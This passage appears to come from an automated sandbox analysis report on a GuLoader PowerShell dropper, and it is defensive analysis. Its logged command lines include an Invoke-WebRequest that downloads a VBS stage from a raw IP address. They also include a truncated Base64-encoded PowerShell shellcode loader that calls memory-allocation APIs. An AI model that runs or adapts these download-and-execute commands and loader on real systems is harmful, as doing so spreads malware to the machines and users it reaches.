AeABhAHMAdABpAGMAaAAzACwAMAAsAFsAcgBlAGYAXQAkAEgAZQB4AGEAcwB0AGkAYwBoADkALAAxADIAMgA4ADgALA
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowspowerShell\v1.0\powershell.exe" -EncodedCommand "IwBiAHIAZABmAGQAdAB0AG8AbgAgAFMAdAB2AG4AZQAgAFoAaQBuAGMAZQBkACAASQBOAEQAUwBUAFQAIABNAGUAdAB0AGEAcgB0AGEAbQBnADcAIABTAGEAbABhACAAYwBlAGIAYQBsACAARgBPAFIAUwBUACAATwBzAHQAZQBvAGwAaQB0ADEAIABVAG4AZABpAHMAYwBvAHUANgAgAEEAZAByAGUAcwBzAGEAIABDAGEAbgBhAGQAaQA5ACAATwBWAEUAUgBUAEEATABFACAAQgBlAG0AZQAgAGQAZQBzAHQAcgB1AGsAdABpACAATwBTAFQARQBBAE4AUgBFAFQATgAgAEQAcgBpAGYAdABzAHMAdAB5AHIAMQAgAEkATgBEAEwARQBEAEUATgBEAEUAIABCAGEAZwB0ADcAIABCAEEAUgBTAEwARQBEAEUAUwAgAE8ATwBQAEgATwAgAEwAYQBjAGUAZAA5ACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAASABlAHgAYQBzAHQAaQBjAGgAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIASwBFAFIATgBFAEwAMwAyACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHYAbwBpAGQAIABSAHQAbABNAG8AdgBlAE0AZQBtAG8AcgB5ACgASQBuAHQAUAB0AHIAIABCAGEAZwBmAHUAbABzADUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAQgBhAGcAZgB1AGwAcwA1ADIALABpAG4AdAAgAEIAYQBnAGYAdQBsAHMANQAzACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAA9ACIATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAVgBBACgAaQBuAHQAIABIAGUAeABhAHMAdABpAGMAaAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABTAGUAbQBpAHIAZQAsAGkAbgB0ACAAQgBhAGcAZgB1AGwAcwA1ACwAcgBlAGYAIABJAG4AdAAzADIAIABIAGUAeABhAHMAdABpAGMAaAAsAGkAbgB0ACAAUAByAGkAbgB0ADgALABpAG4AdAAgAEgAZQB4AGEAcwB0AGkAYwBoADcAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBVAFMARQBSADMAMgAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEUAbgB1AG0AVwBpAG4AZABvAHcAcwAoAHUAaQBuAHQAIABCAGEAZwBmAHUAbABzADUANQAsAGkAbgB0ACAAQgBhAGcAZgB1AGwAcwA1ADYAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMARABFAEgAQQBDAEgARQAgAFQAbwBzAHMAZQAzACAAVABlAGEAdABlAHIANgAgAGQAaQBhAGwAZQBjAHQAaQBjACAARQBOAEwASQBTAFQARQBEAFIAIABGAGQAcwBlADcAIABBAHMAdAByAG8AIABTAHcAZQByAHYAZQByADkAIABkAG8AdwBuAGUAeQAgAHIAaQBiAGgAdQBzAHQAIABUAGEAZwByACAAUwBwAHIAZwBlAHMAIABWAGkAbABsAGEANQAgAEgAZQB0AGUAcgBvAGQAeQBuADEAIABFAFUAUABMAE8ASQAgAEIAeQB0AHQAZQAzACAAcwBuAGsAZQByAGYAcgAgAEIAdQBuAGQAZwBhAHIAbgAgAHMAdAByAG0AawByAGUAZABzACAATAB0AG4AaQBuAGcAYgBpADUAIABpAG4AZABzACAAQQBpAHIAbABpAGYAdAA1ACAATwBDAFQAQQBWAEkATgBBAFYASQAgAFMAawBvAGsAbwBtAGkAcwBoAGIAIABVAGQAcgBlAG4AcwBuAGkAbgBnADUAIABUAGgAcgBhAHcAYwB5ACAATQBvAG4AbwBzAG8AZABpADUAIABpAG0AcABhAGwAZQBtAGUAIABJAG4AZABzAGEAdABzAGUAbgB0ADcAIABvAHIAZABlAG4AcwBtACAAIAANAAoAJABIAGUAeABhAHMAdABpAGMAaAAzAD0AMAA7AA0ACgAkAEgAZQB4AGEAcwB0AGkAYwBoADkAPQAxADAANAA4ADUANwA2ADsADQAKACQASABlAHgAYQBzAHQAaQBjAGgAOAA9AFsASABlAHgAYQBzAHQAaQBjAGgAMQBdADoAOgBWAEEAKAAtADEALABbAHIAZQBmAF0AJABIAGUAeABhAHMAdABpAGMAaAAzACwAMAAsAFsAcgBlAGYAXQAkAEgAZQB4AGEAcwB0AGkAYwBoADkALAAxADIAMgA4ADgALA
    Very long command line found
    Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4264
    Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4264
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFF7F001978
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFF7F011958
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_07A1FA40
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_07A1A340
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_07A1A350
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_07B08200
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_07B08200
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_07B0001E
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_07B00040
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\book.ps1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest -uri http://46.4.198.55/10P/Sursdepa.vbs -o Sursdepa.vbs
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Sursdepa.vbs"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowspowerShell\v1.0\powershell.exe" -EncodedCommand "IwBiAHIAZABmAGQAdAB0AG8AbgAgAFMAdAB2AG4AZQAgAFoAaQBuAGMAZQBkACAASQBOAEQAUwBUAFQAIABNAGUAdAB0AGEAcgB0AGEAbQBnADcAIABTAGEAbABhACAAYwBlAGIAYQBsACAARgBPAFIAUwBUACAATwBzAHQAZQBvAGwAaQB0ADEAIABVAG4AZABpAHMAYwBvAHUANgAgAEEAZAByAGUAcwBzAGEAIABDAGEAbgBhAGQAaQA5ACAATwBWAEUAUgBUAEEATABFACAAQgBlAG0AZQAgAGQAZQBzAHQAcgB1AGsAdABpACAATwBTAFQARQBBAE4AUgBFAFQATgAgAEQAcgBpAGYAdABzAHMAdAB5AHIAMQAgAEkATgBEAEwARQBEAEUATgBEAEUAIABCAGEAZwB0ADcAIABCAEEAUgBTAEwARQBEAEUAUwAgAE8ATwBQAEgATwAgAEwAYQBjAGUAZAA5ACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAASABlAHgAYQBzAHQAaQBjAGgAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIASwBFAFIATgBFAEwAMwAyACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHYAbwBpAGQAIABSAHQAbABNAG8AdgBlAE0AZQBtAG8AcgB5ACgASQBuAHQAUAB0AHIAIABCAGEAZwBmAHUAbABzADUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAQgBhAGcAZgB1AGwAcwA1ADIALABpAG4AdAAgAEIAYQBnAGYAdQBsAHMANQAzACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAA9ACIATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAVgBBACgAaQBuAHQAIABIAGUAeABhAHMAdABpAGMAaAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABTAGUAbQBpAHIAZQAsAGkAbgB0ACAAQgBhAGcAZgB1AGwAcwA1ACwAcgBlAGYAIABJAG4AdAAzADIAIABIAGUAeABhAHMAdABpAGMAaAAsAGkAbgB0ACAAUAByAGkAbgB0ADgALABpAG4AdAAgAEgAZQB4AGEAcwB0AGkAYwBoADcAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBVAFMARQBSADMAMgAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEUAbgB1AG0AVwBpAG4AZABvAHcAcwAoAHUAaQBuAHQAIABCAGEAZwBmAHUAbABzADUANQAsAGkAbgB0ACAAQgBhAGcAZgB1AGwAcwA1ADYAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMARABFAEgAQQBDAEgARQAgAFQAbwBzAHMAZQAzACAAVABlAGEAdABlAHIANgAgAGQAaQBhAGwAZQBjAHQAaQBjACAARQBOAEwASQBTAFQARQBEAFIAIABGAGQAcwBlADcAIABBAHMAdAByAG8AIABTAHcAZQByAHYAZQByADkAIABkAG8AdwBuAGUAeQAgAHIAaQBiAGgAdQBzAHQAIABUAGEAZwByACAAUwBwAHIAZwBlAHMAIABWAGkAbABsAGEANQAgAEgAZQB0AGUAcgBvAGQAeQBuADEAIABFAFUAUABMAE8ASQAgAEIAeQB0AHQAZQAzACAAcwBuAGsAZQByAGYAcgAgAEIAdQBuAGQAZwBhAHIAbgAgAHMAdAByAG0AawByAGUAZABzACAATAB0AG4AaQBuAGcAYgBpADUAIABpAG4AZABzACAAQQBpAHIAbABpAGYAdAA1ACAATwBDAFQAQQBWAEkATgBBAFYASQAgAFMAawBvAGsAbwBtAGkAcwBoAGIAIABVAGQAcgBlAG4AcwBuAGkAbgBnADUAIABUAGgAcgBhAHcAYwB5ACAATQBvAG4AbwBzAG8AZABpADUAIABpAG0AcABhAGwAZQBtAGUAIABJAG4AZABzAGEAdABzAGUAbgB0ADcAIABvAHIAZABlAG4AcwBtACAAIAANAAoAJABIAGUAeABhAHMAdABpAGMAaAAzAD0AMAA7AA0ACgAkAEgAZQB4AGEAcwB0AGkAYwBoADkAPQAxADAANAA4ADUANwA2ADsADQAKACQASABlAHgAYQBzAHQAaQBjAGgAOAA9AFsASABlAHgAYQBzAHQAaQBjAGgAMQBdADoAOgBWAEEAKAAtADEALABbAHIAZQBmAF0AJABIAGUAeABhAHMAdABpAGMAaAAzACwAMAAsAFsAcgBlAGYAXQAkAEgAZQB4AGEAcwB0AGkAYwBoADkALAAxADIAMgA4ADgALA
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xtg032l3\xtg032l3.cmdline
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5295.tmp" "c:\Users\user\AppData\Local\Temp\xtg032l3\CSC5582155B3987404B8B25346C869765C.TMP"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest -uri http://46.4.198.55/10P/Sursdepa.vbs -o Sursdepa.vbs
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Sursdepa.vbs"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowspowerShell\v1.0\powershell.exe" -EncodedCommand "IwBiAHIAZABmAGQAdAB0AG8AbgAgAFMAdAB2AG4AZQAgAFoAaQBuAGMAZQBkACAASQBOAEQAUwBUAFQAIABNAGUAdAB0AGEAcgB0AGEAbQBnADcAIABTAGEAbABhACAAYwBlAGIAYQBsACAARgBPAFIAUwBUACAATwBzAHQAZQBvAGwAaQB0ADEAIABVAG4AZABpAHMAYwBvAHUANgAgAEEAZAByAGUAcwBzAGEAIABDAGEAbgBhAGQAaQA5ACAATwBWAEUAUgBUAEEATABFACAAQgBlAG0AZQAgAGQAZQBzAHQAcgB1AGsAdABpACAATwBTAFQARQBBAE4AUgBFAFQATgAgAEQAcgBpAGYAdABzAHMAdAB5AHIAMQAgAEkATgBEAEwARQBEAEUATgBEAEUAIABCAGEAZwB0ADcAIABCAEEAUgBTAEwARQBEAEUAUwAgAE8ATwBQAEgATwAgAEwAYQBjAGUAZAA5ACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAASABlAHgAYQBzAHQAaQBjAGgAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIASwBFAFIATgBFAEwAMwAyACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHYAbwBpAGQAIABSAHQAbABNAG8AdgBlAE0AZQBtAG8AcgB5ACgASQBuAHQAUAB0AHIAIABCAGEAZwBmAHUAbABzADUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAQgBhAGcAZgB1AGwAcwA1ADIALABpAG4AdAAgAEIAYQBnAGYAdQBsAHMANQAzACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAA9ACIATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAVgBBACgAaQBuAHQAIABIAGUAeABhAHMAdABpAGMAaAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABTAGUAbQBpAHIAZQAsAGkAbgB0ACAAQgBhAGcAZgB1AGwAcwA1ACwAcgBlAGYAIABJAG4AdAAzADIAIABIAGUAeABhAHMAdABpAGMAaAAsAGkAbgB0ACAAUAByAGkAbgB0ADgALABpAG4AdAAgAEgAZQB4AGEAcwB0AGkAYwBoADcAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBVAFMARQBSADMAMgAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEUAbgB1AG0AVwBpAG4AZABvAHcAcwAoAHUAaQBuAHQAIABCAGEAZwBmAHUAbABzADUANQAsAGkAbgB0ACAAQgBhAGcAZgB1AGwAcwA1ADYAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMARABFAEgAQQBDAEgARQAgAFQAbwBzAHMAZQAzACAAVABlAGEAdABlAHIANgAgAGQAaQBhAGwAZQBjAHQAaQBjACAARQBOAEwASQBTAFQARQBEAFIAIABGAGQAcwBlADcAIABBAHMAdAByAG8AIABTAHcAZQByAHYAZQByADkAIABkAG8AdwBuAGUAeQAgAHIAaQBiAGgAdQBzAHQAIABUAGEAZwByACAAUwBwAHIAZwBlAHMAIABWAGkAbABsAGEANQAgAEgAZQB0AGUAcgBvAGQAeQBuADEAIABFAFUAUABMAE8ASQAgAEIAeQB0AHQAZQAzACAAcwBuAGsAZQByAGYAcgAgAEIAdQBuAGQAZwBhAHIAbgAgAHMAdAByAG0AawByAGUAZABzACAATAB0AG4AaQBuAGcAYgBpADUAIABpAG4AZABzACAAQQBpAHIAbABpAGYAdAA1ACAATwBDAFQAQQBWAEkATgBBAFYASQAgAFMAawBvAGsAbwBtAGkAcwBoAGIAIABVAGQAcgBlAG4AcwBuAGkAbgBnADUAIABUAGgAcgBhAHcAYwB5ACAATQBvAG4AbwBzAG8AZABpADUAIABpAG0AcABhAGwAZQBtAGUAIABJAG4AZABzAGEAdABzAGUAbgB0ADcAIABvAHIAZABlAG4AcwBtACAAIAANAAoAJABIAGUAeABhAHMAdABpAGMAaAAzAD0AMAA7AA0ACgAkAEgAZQB4AGEAcwB0AGkAYwBoADkAPQAxADAANAA4ADUANwA2ADsADQAKACQASABlAHgAYQBzAHQAaQBjAGgAOAA9AFsASABlAHgAYQBzAHQAaQBjAGgAMQBdADoAOgBWAEEAKAAtADEALABbAHIAZQBmAF0AJABIAGUAeABhAHMAdABpAGMAaAAzACwAMAAsAFsAcgBlAGYAXQAkAEgAZQB4AGEAcwB0AGkAYwBoADkALAAxADIAMgA4ADgALA
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xtg032l3\xtg032l3.cmdline
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5295.tmp" "c:\Users\user\AppData\Local\Temp\xtg032l3\CSC5582155B3987404B8B25346C869765C.TMP"
    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1716:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4084:120:WilError_01
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest -uri http://46.4.198.55/10P/Sursdepa.vbs -o Sursdepa.vbs
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220510Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eghthspv.xqw.ps1Jump to behavior
    Source: classification engineClassification label: mal72.troj.evad.winPS1@13/19@0/1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

    Data Obfuscation

    barindex
    Yara detected GuLoader
    Source: Yara matchFile source: 0000000E.00000002.544284081.0000000009290000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_07A1D7DD push FFFFFF8Bh; iretd
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_07A1D589 push FFFFFF8Bh; iretd
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_07A10D5A push eax; mov dword ptr [esp], edx
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xtg032l3\xtg032l3.cmdline
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xtg032l3\xtg032l3.cmdline
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\xtg032l3\xtg032l3.dllJump to dropped file
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
